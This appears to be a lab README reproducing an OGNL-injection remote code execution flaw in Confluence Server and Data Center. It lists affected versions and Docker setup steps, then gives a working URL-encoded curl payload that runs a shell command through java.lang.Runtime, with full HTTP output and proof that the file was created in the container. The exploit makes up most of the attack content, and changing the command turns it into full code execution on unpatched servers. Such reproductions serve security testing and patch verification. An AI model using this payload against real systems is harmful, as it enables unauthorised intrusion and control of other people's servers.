This vulnerability affects Confluence Server and Confluence Data Center. It allows an attacker to send a specially crafted HTTP request to abuse OGNL within Confluence, leading to remote code execution.
In order for this vulnerability to be exploitable, the following conditions must be met:
- Use versions of Confluence lower than 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1
- Confluence is configured (can't use a server that hasn't been installed and not connected to a DB)
Run it:
docker-compose up
Install confluence
- Navigate to
localhost:8090 - Get a trial license (this won't work without one)
- It'll take a while to configure, make sure you have 3-4gb of RAM
- Use a test site/template, and use confluence to manage users. Fill in default for admin
- Once you get past the admin creation step, you can run the exploit
curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
Output:
└> curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
* Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 8090 (#0)
> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1
> Host: localhost:8090
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< Cache-Control: no-store
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Confluence-Request-Time: 1654294225669
< Set-Cookie: JSESSIONID=A12C784ACFF928E9155587F78E9EC0C0; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fpwned%22%29%7D%2Findex.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Fri, 03 Jun 2022 22:10:25 GMT
<
* Connection #0 to host localhost left intact
* Closing connection 0
Exec into the container
└> docker exec -it vulnerable-confluence bash
root@b2db3bfbe364:/var/atlassian/application-data/confluence# ls -lah /tmp
total 12K
drwxrwxrwt 1 root root 4.0K Jun 3 22:12 .
drwxr-xr-x 1 root root 4.0K Jun 3 19:56 ..
drwxr-xr-x 2 confluence confluence 4.0K Jun 3 22:07 hsperfdata_confluence
-rw-r----- 1 confluence confluence 0 Jun 3 22:10 pwned